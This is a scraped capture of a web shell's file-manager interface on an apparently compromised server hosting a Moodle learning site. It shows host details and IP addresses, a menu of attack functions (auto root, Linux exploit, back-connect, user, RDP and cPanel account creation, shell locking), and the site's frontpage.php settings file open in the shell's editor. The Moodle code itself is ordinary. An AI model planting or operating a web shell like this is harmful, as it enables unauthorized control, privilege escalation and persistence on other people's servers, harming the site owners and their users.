Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 108.162.216.82
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
admin /
settings /
[ HOME SHELL ]
Name
Size
Permission
Action
analytics.php
8.14
KB
-rw-r--r--
appearance.php
21.35
KB
-rw-rw-r--
badges.php
4.19
KB
-rw-r--r--
competency.php
1.89
KB
-rw-rw-r--
courses.php
40.25
KB
-rw-rw-r--
development.php
7.51
KB
-rw-r--r--
frontpage.php
3.77
KB
-rw-r--r--
grades.php
15.82
KB
-rw-rw-r--
h5p.php
1.88
KB
-rw-r--r--
language.php
1.75
KB
-rw-rw-r--
license.php
1.63
KB
-rw-r--r--
location.php
2.4
KB
-rw-r--r--
messaging.php
3.3
KB
-rw-rw-r--
mnet.php
3
KB
-rw-rw-r--
moodleservices.php
1.88
KB
-rw-r--r--
payment.php
1.08
KB
-rw-r--r--
plugins.php
38.42
KB
-rw-rw-r--
security.php
13.43
KB
-rw-rw-r--
server.php
29.6
KB
-rw-rw-r--
subsystems.php
4.52
KB
-rw-rw-r--
top.php
3.49
KB
-rw-r--r--
userfeedback.php
2.14
KB
-rw-r--r--
users.php
17.49
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : frontpage.php
<?php // This file defines everything related to frontpage if (!during_initial_install()) { //do not use during installation $frontpagecontext = context_course::instance(SITEID); if ($hassiteconfig or has_any_capability(array( 'moodle/course:update', 'moodle/role:assign', 'moodle/restore:restorecourse', 'moodle/backup:backupcourse', 'moodle/course:managefiles', 'moodle/question:add', 'moodle/question:editmine', 'moodle/question:editall', 'moodle/question:viewmine', 'moodle/question:viewall', 'moodle/question:movemine', 'moodle/question:moveall'), $frontpagecontext)) { // "frontpage" settingpage $temp = new admin_settingpage('frontpagesettings', new lang_string('frontpagesettings','admin'), 'moodle/course:update', false, $frontpagecontext); $temp->add(new admin_setting_sitesettext('fullname', new lang_string('fullsitename'), '', NULL)); // no default $temp->add(new admin_setting_sitesettext('shortname', new lang_string('shortsitename'), '', NULL)); // no default $temp->add(new admin_setting_special_frontpagedesc()); $temp->add(new admin_setting_courselist_frontpage(false)); // non-loggedin version of the setting (that's what the parameter is for :) ) $temp->add(new admin_setting_courselist_frontpage(true)); // loggedin version of the setting $options = array(); $options[] = new lang_string('unlimited'); for ($i=1; $i<100; $i++) { $options[$i] = $i; } $temp->add(new admin_setting_configselect('maxcategorydepth', new lang_string('configsitemaxcategorydepth','admin'), new lang_string('configsitemaxcategorydepthhelp','admin'), 2, $options)); $temp->add(new admin_setting_configtext('frontpagecourselimit', new lang_string('configfrontpagecourselimit','admin'), new lang_string('configfrontpagecourselimithelp','admin'), 200, PARAM_INT)); $temp->add(new admin_setting_sitesetcheckbox('numsections', new lang_string('sitesection'), new lang_string('sitesectionhelp','admin'), 1)); $temp->add(new admin_setting_sitesetselect('newsitems', new lang_string('newsitemsnumber'), '', 3, array('0' => '0', '1' => '1', '2' => '2', '3' => '3', '4' => '4', '5' => '5', '6' => '6', '7' => '7', '8' => '8', '9' => '9', '10' => '10'))); $temp->add(new admin_setting_configtext('commentsperpage', new lang_string('commentsperpage', 'admin'), '', 15, PARAM_INT)); // front page default role $options = array(0=>new lang_string('none')); // roles to choose from $defaultfrontpageroleid = 0; $roles = role_fix_names(get_all_roles(), null, ROLENAME_ORIGINALANDSHORT); foreach ($roles as $role) { if (empty($role->archetype) or $role->archetype === 'guest' or $role->archetype === 'frontpage' or $role->archetype === 'student') { $options[$role->id] = $role->localname; if ($role->archetype === 'frontpage' && !$defaultfrontpageroleid) { $defaultfrontpageroleid = $role->id; } } } if ($defaultfrontpageroleid and (!isset($CFG->defaultfrontpageroleid) or $CFG->defaultfrontpageroleid)) { //frotpage role may not exist in old upgraded sites unset($options[0]); } $temp->add(new admin_setting_configselect('defaultfrontpageroleid', new lang_string('frontpagedefaultrole', 'admin'), '', $defaultfrontpageroleid, $options)); $ADMIN->add('frontpage', $temp); } }
Close